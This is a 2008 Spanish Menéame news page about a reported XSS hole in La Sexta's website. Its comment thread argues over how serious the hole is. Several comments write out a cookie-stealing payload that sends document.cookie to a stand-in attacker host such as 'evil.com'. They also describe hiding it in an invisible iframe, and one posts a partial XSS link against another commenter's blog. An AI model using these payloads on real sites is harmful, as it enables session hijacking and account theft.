mejores comentarios
- jcarlosn: #18 Solo te voy a citar lo que ha contestado el...
- Pedriyu: #17 Iglesia: Curas pederastas, cinismo, corrupció...
- a330x: No va a salir ahora el follonero riendose de la...
- jcarlosn: #21 Lo primero tu dices: Esa es una...
- jcarlosn: #27 no se que imagen tienes de mi, de rooibo, o...
- alexwing: Yo he leído agujero y La sexta, y solo pude...
- jcarlosn: #23 y #25 a ver......
- jcarlosn: #39 me parece increible que aún no entiendas como...
- DZPM: Que suerte tengo de usar NoScript :-) NoScript...
- --93991--: #1 refiriéndonos a La Sexta sería más adecuada la...
- DZPM: #39: ¿Pero que dices, flipao? ¿Modificar el...
- Ap0: #27 leer tu comentario me ha recordado a las...
- Kartoffel: ¡Zas! ¡Con su propia medicina!
- natrix: #73 Creo que hasta yo lo he entendido....
- jcarlosn: #57 lo podría haber puesto rooibo en un iframe...
- psk: #47 ¿pero qué rebatir Voyager? Te están diciendo...
- Abeel: Como soy fricky lo digo yo primero ... OWNED!
- indalito: Follonero se mete con la Iglesia: Que guapo tio...
- pardau: #17 Meterse con la iglesia -> no perjudica...
noticias más votadas
1319
Hermann Tertsch tuvo dos incidentes con mujeres antes de su agresión
1529
"Gritamos y gritamos, pero mi padre falleció sin ser atendido"
1180
Todos contra la Ley Audiovisual y con la ampliación de 12 a 29 minutos de emisión de publicidad por hora
729
"21 días en el mundo del porno" será finalmente una realidad
887
¿Por qué nadie hace nada contra quienes escuchan música con altavoces?
764
Un coche oficial mal aparcado obstaculiza a la Policía Local de Valencia, pero... no es sancionado
602
No hay, ni habrá, recuperación inmobiliaria. Sí que nos espera un muy severísimo desplome de los precios
716
La FIFA eligió a Messi como el mejor jugador de fútbol de 2009
507
El Tribunal Supremo considera inconstitucional la Ley del Cine
1151
UNICEF confirma que Cuba tiene 0% de Desnutrición Infantil
suscripciones por RSS
369meneos
Agujero de seguridad grave en La Sexta
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-e... por jcarlosn el 28-08-2008 20:13 UTC, publicado el 28-08-2008 20:30 UTC
Se descubre un grave agujero de seguridad en la sexta, motivado, según el autor, por la actuación de el follonero hacia wikipedia (meneame.net/story/programa-follonero-sexta-vandaliza-wikipedia-para-brs), increible lo fácil que parece resultar encontrar agujeros de seguridad en páginas y sistemas de medios de comunicación importantes.
NoScript es una extensión de Firefox que bloquea los ataques XSS, como este.
noscript.net/
Edit:
No es la primera vulnerabilidad gorda que les pillan: meneame.net/story/simpatico-hackeo-web-oficial-hicisteis
+1.
www.gatovolador.kroaton.net/2008/07/20/descargar-videos-de-internet-2-l
No querías zas, pues toma dos en toda la boca. Que les den...
Follonero la lía con la wikipedia: Menudo cabrón mascachapas...
Cuando el tema nos toca de cerca, cambia mucho la cosa...
Para quedar bien y colarsela a los que no saben, esta bien, pero es poco serio...
Wikipedia: Información gratuita al alcance de quien tenga internet, posibilidad de compartir conocimientos editándola...
Si, cambia mucho la cosa...
Solo te voy a citar lo que ha contestado el propio autor del blog:
A ver Albert y Vii, sois unos ignorantes, al tener código Javascript que se ejecuta y que se puede controlar, basta con crear un enlace, con un código estilo:
_document.location=’evil.com/index.php?c=’+document.cookie+’;_
Para pasar la cookie a un tercero, mediante get.
Para conseguir que alguien visite ese enlace, basta insertarlo en un iframe invisible en cualquier web, y esperar a que vayan cayendo cookies.
Cuanta ignorancia, por dios
Y yo mismo lo he probado, no solo funciona con usuarios no registrados, pero entiendo que el autor no quiera dar muchos detalles, pues no es bueno facilitarle la vida a posibles delincuentes informáticos.
No entiendo por que en cada noticia de seguridad, aparecen los típicos listillos como tu, soltando tonterías a diestro y siniestro, y negándolo siempre y todo. Según vosotros, los bugs solo son válidos cuando se distribuyen con su prueba de concepto válida para idiotas (descargar y ejecutar), que solo consigue causar perdidas a la empresa.
Se nota mucho que no os dedicáis a la seguridad profesionalmente :)
Y por cierto #18, tu que eres tan experto en seguridad que en tu propia web (sacada de tu perfil propio de meneame)
voyager.kwikphp.com/wp-content/plugins/
directory listing con disclossure de tus plugins del wordpress, me acuerdo de a mas de uno han hackeado con eso, y la de veces que han dicho lo peligroso que es eso :)
Que eso no te parece un bug lo suficientemente serio:
voyager.kwikphp.com/index.php?s=%27%22%3E%3Cbody%20onload=%22alert(docr
toma xss explotable en tu propia web, eres todo un experto, eh!
:)
No creeras que voy a poner la original.. :D
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay :)
Si te molesta que te llame aprendiz por haber descubierto ese pseudobug, chico aprende un poco antes de postear en meneame
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta3
Felicidades chaval, you're retarded, te has llevado el premio "tontolculo del día"
Vamos, que yo sepa document.cookie muestra la cookie de uno mismo siempre... No devuelve nada que haya guardado en el servidor, y menos lo de otro usuario, asi que no acabo de ver que gana con eso...
Aparte es que se puede ver con su propio ejemplo. Si eso realmente devolviera una cookie de un usuario, entonces si se mete un usuario que no existe no debería devolver nada. Ain embargo su ejemplo con el usuario "lol" que no está registrado (al menos en este momento)., si que muestra una cookie, la nuestra propia.
Edito:
#19 Acabo de leer tu comentario, ahora veo por donde va. Sorry por repetirme :)
Lo primero tu dices:
Esa es una copia para que los aprendices de hacker jueguen ser hacker :D
No creeras que voy a poner la original.. :D
Es la excusa mas pobre que he leído en todo el tiempo que llevo dedicándome profesionalmente a la seguridad, creeme, es la peor. La gente suele decir cosas como: "Es que no es la página definitiva" o cosas así, pero tu excusa no hay por donde cogerla.
Lo segundo, tu dices:
Lo que se consigue con esa "cookie" es una cookie local. Necesitas el password encriptado en MD5 para poder autentificarte como usuario... con esa cookie LOCAL poco podras hacer...
No hace falta que el autor de mas detalles... es que NO los hay
Lo que demuestras con eso, es una completa ignorancia en el campo de desarollo web, como sabrá cualquiera que no lea y programe webs.
Si le robas la cookie local a un usuario, le robas la única pieza de información que mantiene vivo el contexto de sesión, por lo cual, al utilizarla, automáticamente utilizas su sesión con sus privilegios, pero vaya, que todo esto está documentado en wikipedia, por si quieres aprender un poco mas sobre XSS.
Los XSS, son según securityfocus el agujero mas peligroso en relación abundancia-riesgo, pero entiendo que tu has venido hasta aquí, al meneame, a contradecir lo que dicen los principales expertos del mundo.
Lo siento, pero me saca de mis casillas la gente como tu.
Si existe una posibilidad, de controlar código javascript que entra por los argumentos, como es el caso, para leer la cookie del usuario, en el contexto de su sesión (su cookie local, vaya), se puede crear una petición en lugar de:
alert(document.cookie);
pues:
document.location='paginadelatacante.com/insertarcookie.php?cookie='+document.cookie;
y todo el enlace, con el xss, y ese código inyectado en el, meterlo en un iframe de 0x0 (invisible) en una web que controlemos, ya solo nos falta que la gente entre a nuestra web (una web normal), para que el iframe ejecute la petición, se produzca el XSS y con ello, la redirección, pasando la cookie a la web del atacante, insertarcookie.php podría ir insertando todas las cookies que recibe en una base de datos, para que luego el atacante, las pudiese utilizar. Y todo ello, sin que se vea nada ni el usuario haga nada, mas que visitar una web, que podría divulgarse entre los usuarios de dicha web, como se ha hecho en el pasado con bugs similares. :)
Y creo que ya se han dado demasiado detalles
Si se loggea como yo y pone un post, me habrá convencido.
Si no, deduciré que es solo una fantasmada...
hace? :)
No es una excusa... es una pagina de pruebas :D
:D
Explotar estos agujeros es un delito tipificado en la ley española, no se si estás al tanto.
Y es un delito, que de denunciar, denunciaría la sexta, y no tu, por lo que nadie va a caer en el juego de explotar este agujero solo para demostrarte nada, estas cosas requieren un uso responsable, y ni mucho menos, nadie se va a poner a hacer ataques contra la sexta por un flame en el meneame, eso sería muy infantil.
resulta un comentario un tanto infantil e hipócrita por tu parte.
Ah, respecto a lo de los fantasmas, has probado a mirarte en un espejo?
#24 Doy fe que esa no es la web de este hombre. Le conozco de varios foros.
Aún así Voyager ni yo mismo me creería la escusa que diste. En meneame tienes más posibilidades de ser creído si dices que eres un HOYGAN borracho :P
Es que estaba volviendo a dudar, ya que me quede pensando que ejecutar la instruccion que lee la cookie lo puede hacer sin necesidad de usar ninguna pagina externa, pero no me daba cuenta que asi solo consigue la cookie del dominio de la web que usamos y no la de la web con la vulnerabilidad ^_^U
> (...) que decian "solo me creo que sepas algo si me hackeaaas, te doy mi ip? la quieres? va va va a ver que h4x0r eres!!"
Mucho mejor los que decían "Soy un jaker peligroso y si me das tu IP te juankeo", y le confesabas que tu IP es la 127.80.13.28... xD
A Voyager (#27 y demás), si una fuente no-fiable ejecuta javascript en tu máquina te ha own3ado, así de sencillo... y, como prueba de concepto, ¿quierer ir a meatspin o prefieres un bucle infinito? :-p
@Voyager, no creo que si supieras a que se dedica @jcarlosn, te atrevieras a comentar como en #30
No lo voy a re-explicar por enésima vez, te recomiendo que leas:
en.wikipedia.org/wiki/Cross-site_scripting#Exploit_scenarios
Donde aclaran todo esto a la perfección.
Ah, espera, que en wikipedia también son unos fantasmas? :)
Culturízate un poco, si vas de sobrao, sin tener ni idea del tema, quedas fatal:
en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities.[1] Often during an attack "everything looks fine" to the end-user[2] who may be subject to unauthorized access, theft of sensitive data, and financial loss.[3]
No estamos hablando de un ataque SQL injection, ni BSQL injection... de todas formas, aunque veas que la gente está equivocada, lo mínimo que deberías de hacer es explicarlo y guardar las formas (cosa esta última que se te da muy mal).
Tienes la mirada sucia :)
EDITO: #52 también la mente. La culpa es de los Bloggers que las "suben" como putas
Bastaría con que siguieras un enlace para que tu cookie saliera de tu equipo y fuera a terminar a un servidor QUE NO ES el de la sexta. Tan fácil como eso. Una vez sucedido, el dueño del servidor para el que se haya programado el "exploit" tiene acceso a tu cookie y por tanto a tu sesión.
Repite conmigo: 2+2=4.
:)
Si alguien tiene curiosidad: es.php.net/manual/es/book.session.php
Y ya no voy a seguir, lo siento.
DON'T FEED THE TROLL
Y el resto? Si el admin nunca se pasa por aqui, nunca podremos suplantarle? :D
No veo relación.
Finalizar los mensajes con caritas felices no ayuda xD.
Y es más, me has hecho hasta registrarme tras llevar ya mucho tiempo siendo anónimo :P
Meterse con la iglesia -> no perjudica directamente a nadie.
Meterse con la Wikipedia -> no perjudica directamente a nadie.
Vandalizar la Wikipedia -> puede perjudicar a alguien.
Que se meta con la Wikipedia todo lo que quiera, pero que no altere su información.
El malo se hace una web: www.lasextaeslahostia.com
El malo mete en esa web un iframe (que yo ni sabía lo que era) que lleva un código que empieza por "document.location="
El malo se pasa por los foros de la sexta, Pilar Rubio, Patricia Conde y Buenafuente y le dice a la gente que visto una web que es la leche de buena.
El pardillo entra en la web www.lasextaeslahostia.com y se activa el código del iframe, que manda las cookies del pardillo (las que tiene en su ordenador para entrar en www.lasexta.com) a la web del malo.
El malo tiene el user + pass del pardillo.
Si me he equivocado, es culpa vuestra que no hay quien os entienda. :-P
P.D: #20 No sé qué has puesto en ese enlace que se me ha encendido el Firefox+script como nunca.
soy el unico que le suena a chino todo eso de exploit y XSS?
no te acostaras....
Es decir, como fallo de seguridad, en concepto, es grave, pero a la hora de la verdad, dudo que un admin competente entre a ese enlace.
Pero ahi ya entra lo que cada uno considere grave, si la posibilidad, o el riesgo real. Y por eso se ha montado todo este pollo.
meneame.net/story/programa-follonero-sexta-vandaliza-wikipedia-para-br3
No es un fallo de seguridad GRAVE, en todo caso un fallo de seguridad en la escala de Secunia "Less Critical (2 of 5)"
Debido a que ese foro no lo conoce ni Dios, quien va a querer entrar el el foro de la Sexta habiendo MILLONES de foros mejores y dudo que alguien que lo visite se registre y te mande sus cookies, ya que es abierto a visitantes...
para lo que hay que ver ahi quien se va a registrar...
Un poco de humildad, que te crees Dios... dime de que presumes...
Y me da igual que tu o tus neonicks o palmeros me voten negativo... si me pusiera a hacer lo mismo que vosotros estaria a vuestro nivel.
Un poco de madurez, chavales...
Vamos, que el follonero si se entera, no va a entender que puede repercutir este fallo contra el gran fallo de modificar la wiki.
SI al menos hubierais descubierto como modificar la web del follonero
www.lasexta.com/programa/salvados/eurocopa/471
pues eso si que sería grave (al menos para él)
Basta con que uses este XSS para obtener la cookie del admin, con eso tendrás acceso de escritura a la web y podrás cambiar la foto del tipo ese por la de un perro haciendo caca. ¿Contento?
Yo flipo como tanta gente "entiende" de seguridad, pero solo cuando pueden ejecutar un exploit... menuda panda de lamers.
Es decir, para conseguir la cookie de admin, admin debe ejecutar el exploit. Y aunque lo ejecutara. sólo podrías modificar su foro, no la web completa...
Saludos de un "lammer"
Prueba de ello es que aun nadie ha modificado la web. A estar alturas deberia estar ya modificada.
Estamos hablando en términos de seguridad mas o menos serios, que nos importa lo que diga un troll que ya se ha visto que solo busca crear un flame? es un troll de libro.
ya lo dije arriba: DON'T FEED THE TROLL
Va a continuar diciendo lo que dice una y otra vez, para alargar el flame.
Quien tenga ojos que lea.
El blog "desvarios informáticos" (por cierto nombre apropiado) fue creado el 28-8-2008 a las 21:05
Sólo tiene dos artículos, creados a la misma hora...
Hmmm... aquí alguien quiere ocultar algo! :-D
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta/
rooibo.wordpress.com/2008/08/28/agujero-de-seguridad-grave-en-la-sexta9
"Pues nose, igual tu y tu abuela tuerta sois los reyes del universo, porque yo he estudiado informática y no sé hacer esto.. será que soy de redes."
Cuanto daño hace la sgae :)